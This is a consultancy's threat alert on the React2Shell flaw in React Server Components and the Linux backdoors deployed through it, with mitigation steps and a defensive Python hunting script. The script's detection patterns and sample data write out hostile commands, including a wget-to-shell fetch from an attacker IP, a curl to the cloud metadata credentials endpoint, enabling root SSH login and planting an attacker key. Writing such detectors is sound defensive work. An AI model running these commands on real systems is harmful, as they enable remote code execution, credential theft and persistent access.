Perceptive Security
SOC/SIEM Consultancy

React2Shell Vulnerability Actively Exploited to Deploy Linux Backdoors
Published:
16 December 2025 at 08:21:00
Alert date:
16 December 2025 at 09:01:26
Source:
thehackernews.com
Web Technologies, Zero-Day Vulnerabilities, Ransomware & Malware, Data Breach & Exfiltration
React2Shell (CVE-2025-55182), an unsafe-deserialization remote code execution flaw in React Server Components, is being actively exploited to deploy malware families including KSwapDoor and ZnDoor on Linux servers. Palo Alto Networks Unit 42 describes KSwapDoor as a professionally engineered remote access tool built for stealth, and NTT Security has documented ZnDoor; together the two reports show an ongoing campaign against Linux environments reachable through this vulnerability.
Technical details
React2Shell (CVE-2025-55182) is an unsafe-deserialization RCE in React Server Components; Next.js applications are exposed through the related CVE-2025-66478. Successful exploitation is being used to drop Linux backdoors including KSwapDoor and ZnDoor.
KSwapDoor builds an internal mesh network over which compromised servers relay traffic for one another, encrypts its communications (the source calls the encryption "military-grade" without naming the algorithm), has a sleeper mode intended to bypass firewall rules, and hides by impersonating the Linux kernel swap daemon (kswapd0), which on a clean system exists only as a kernel thread.
ZnDoor has been active since December 2023 and supports shell execution, file operations, system information gathering, a SOCKS5 proxy and port forwarding.
Observed attack chains run bash commands on the exploited server that fetch payloads from remote infrastructure with wget. Multiple China-nexus threat groups have weaponised the vulnerability to deliver a variety of payloads. Attackers stage payloads and command-and-control behind Cloudflare Tunnel (*.trycloudflare.com) endpoints to evade reputation-based blocking, and query cloud metadata services (the link-local 169.254.169.254 endpoint) to harvest instance credentials.
Mitigation steps:
Patch CVE-2025-55182 in the React Server Components packages and CVE-2025-66478 in Next.js immediately.
Monitor for bash processes spawned by the Node.js process serving the application that fetch payloads with wget or curl, especially when the output is piped straight into a shell.
Watch for outbound connections to *.trycloudflare.com endpoints.
Alert on unauthorised access to cloud metadata services (169.254.169.254) from the web application's host or process.
Check for unauthorised changes to authorized_keys files and for PermitRootLogin being enabled in sshd_config.
Scan for RMM tools such as MeshAgent.
Monitor for credential-harvesting tools such as TruffleHog and Gitleaks.
Verify process integrity to catch kernel swap daemon impersonation: a genuine kswapd0 is a kernel thread (parent kthreadd, PID 2, empty command line, no executable on disk), so any kswapd process with a different parent or a readable /proc/<pid>/exe is an impostor.
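A hunting script that covers the attack-chain indicators in the technical details and the monitoring items in the mitigation list, added here as an example and not code from The Hacker News, Unit 42 or NTT Security. It classifies command lines against the behaviours the alert names (wget/curl payload fetch, pipe to shell, trycloudflare.com endpoints, metadata-service access, authorized_keys and PermitRootLogin changes, MeshAgent, TruffleHog/Gitleaks, the two IOC IPs) and flags a kswapd impostor using the fact that the real swap daemon is a kernel thread. The regexes, tag names, record layout and the read_proc_table helper are my own assumptions, not signatures published by the researchers; the process table and command lines at the bottom are constructed for illustration.

```python
"""Linux post-exploitation hunt for the React2Shell (CVE-2025-55182) indicators in this alert.
Added example, not code from The Hacker News, Unit 42 or NTT Security: the regexes are my own
encoding of the behaviours the alert lists, and the sample data at the bottom is constructed."""
import os
import re
from pathlib import Path

IOC_IPS = {"45.76.155.14", "67.217.57.240"}  # from the IOC line of this alert (re-fanged)

# Applied to one full command line (shell history, auditd execve reconstruction,
# EDR telemetry, /proc/<pid>/cmdline). Tag names are assumptions for this example.
CMDLINE_PATTERNS = {
    "http_fetch": re.compile(r"\b(wget|curl)\b[^|;&]*https?://", re.I),
    "pipe_to_shell": re.compile(r"\|\s*(ba)?sh\b", re.I),
    "cloudflare_tunnel": re.compile(r"[\w.-]*\.trycloudflare\.com\b", re.I),
    "metadata_access": re.compile(r"169\.254\.169\.254|metadata\.google\.internal", re.I),
    "ssh_key_write": re.compile(r"authorized_keys", re.I),
    "root_login_enable": re.compile(r"PermitRootLogin\s+yes", re.I),
    "rmm_agent": re.compile(r"meshagent", re.I),
    "secret_scanner": re.compile(r"\b(trufflehog|gitleaks)\b", re.I),
}
IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def classify_cmdline(cmdline: str) -> set:
    """Return the alert-relevant behaviours present in one command line."""
    tags = {name for name, rx in CMDLINE_PATTERNS.items() if rx.search(cmdline)}
    if IOC_IPS & set(IPV4_RE.findall(cmdline)):
        tags.add("ioc_ip")
    return tags


def is_fake_kswapd(proc: dict) -> bool:
    """True for a user-space process wearing the kernel swap daemon's name.
    A genuine kswapdN is a kernel thread: parent kthreadd (PID 2), empty cmdline and
    no readable /proc/<pid>/exe. A backdoor can copy the name, not those properties."""
    argv0 = proc["cmdline"].split(" ", 1)[0] if proc["cmdline"] else ""
    names = {proc["comm"].strip("[]"), argv0.strip("[]")}
    if not any(re.fullmatch(r"kswapd\d+", n) for n in names):
        return False
    return proc["ppid"] != 2 or bool(proc["cmdline"]) or proc["exe"] is not None


def read_proc_table() -> list:
    """Snapshot /proc into the record shape used above (Linux only; run as root)."""
    procs = []
    for entry in filter(str.isdigit, os.listdir("/proc")):
        base = Path("/proc", entry)
        try:
            comm = (base / "comm").read_text().strip()
            cmdline = (base / "cmdline").read_bytes().replace(b"\0", b" ").decode(errors="replace").strip()
            ppid = int(re.search(r"^PPid:\s*(\d+)", (base / "status").read_text(), re.M).group(1))
        except (OSError, AttributeError):
            continue  # process exited, is unreadable, or its status file was unparsable
        try:
            exe = os.readlink(base / "exe")
        except OSError:
            exe = None  # kernel threads (and zombies) have no readable exe link
        procs.append({"pid": int(entry), "ppid": ppid, "comm": comm, "cmdline": cmdline, "exe": exe})
    return procs


def hunt(procs: list, cmdlines: list) -> list:
    """Run both checks; each finding is (kind, detail, tags)."""
    findings = []
    for p in procs:
        if is_fake_kswapd(p):
            findings.append(("fake_kswapd", f"pid={p['pid']} ppid={p['ppid']} exe={p['exe']}", set()))
        tags = classify_cmdline(p["cmdline"])
        if tags:
            findings.append(("process", f"pid={p['pid']} {p['cmdline']}", tags))
    for line in cmdlines:
        tags = classify_cmdline(line)
        if tags:
            findings.append(("history", line, tags))
    return findings


# Constructed sample data, not a real capture. PID 73 is what a genuine kswapd0
# looks like; PID 4121 is the impostor pattern the alert describes.
SAMPLE_PROCS = [
    {"pid": 73, "ppid": 2, "comm": "kswapd0", "cmdline": "", "exe": None},
    {"pid": 4121, "ppid": 1, "comm": "kswapd0", "cmdline": "[kswapd0]", "exe": "/tmp/.x/kswapd0"},
    {"pid": 4200, "ppid": 4121, "comm": "bash", "exe": "/usr/bin/bash",
     "cmdline": "bash -c wget -qO- http://67.217.57.240:888/a.sh | sh"},
]
SAMPLE_CMDLINES = [
    "curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "wget https://quiet-field-abc.trycloudflare.com/meshagent -O /tmp/meshagent",
    "trufflehog filesystem /var/www --json",
    "sed -i 's/^#PermitRootLogin.*/PermitRootLogin yes/' /etc/ssh/sshd_config",
    "echo 'ssh-ed25519 AAAA... attacker' >> /root/.ssh/authorized_keys",
    "npm run build",
]

if __name__ == "__main__":
    for kind, detail, tags in hunt(SAMPLE_PROCS, SAMPLE_CMDLINES):
        print(f"{kind:12} {sorted(tags)} {detail}")
```

On a live host, call hunt(read_proc_table(), Path("/root/.bash_history").read_text().splitlines()) as root so every /proc/<pid>/exe link is readable. Treat hits as leads, not verdicts: cloud agents legitimately query the metadata endpoint, so tune with an allowlist keyed on the parent process. The kswapd check only catches user-space impersonation, which is what the alert describes; a kernel-level rootkit that forges the parent PID would need a different control.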
Affected products:
React Server Components
Next.js
Linux systems
Related links:
https://thehackernews.com/2025/12/react2shell-exploitation-delivers.html
https://unit42.paloaltonetworks.com/cve-2025-55182-react-and-cve-2025-66478-next/
https://jp.security.ntt/insights_resources/tech_blog/react2shell_malware_zndoor/
https://www.praetorian.com/blog/critical-advisory-remote-code-execution-in-next-js-cve-2025-66478-with-working-exploit/
https://thehackernews.com/2025/12/react2shell-exploitation-escalates-into.html
https://www.microsoft.com/en-us/security/blog/2025/12/15/defending-against-the-cve-2025-55182-react2shell-vulnerability-in-react-server-components/
https://beelzebub.ai/blog/threat-huntinga-analysis-of-a-nextjs-exploit-campaign/
https://thehackernews.com/2025/03/critical-nextjs-vulnerability-allows.html
https://thehackernews.com/2025/12/critical-rsc-bugs-in-react-and-nextjs.html
https://dashboard.shadowserver.org/statistics/combined/time-series/?date_range=7&source=http_vulnerable&source=http_vulnerable6&tag=cve-2025-55182%2B&dataset=unique_ips&limit=100&group_by=geo&stacking=stacked&auto_update=on
https://dashboard.shadowserver.org/statistics/combined/tree/?date_range=1&source=http_vulnerable&source=http_vulnerable6&tag=cve-2025-55182%2B&data_set=count&scale=log&auto_update=on
https://viz.greynoise.io/query/tags:%22React%20Server%20Components%20Unsafe%20Deserialization%20CVE-2025-55182%20RCE%20Attempt%22%20last_seen:1d
Related CVEs:
CVE-2025-66478
Related threat actors:
IOCs (defanged):
45.76.155[.]14, 67.217.57[.]240:888, *.trycloudflare.com
This article was created with the assistance of AI technology by Perceptive.
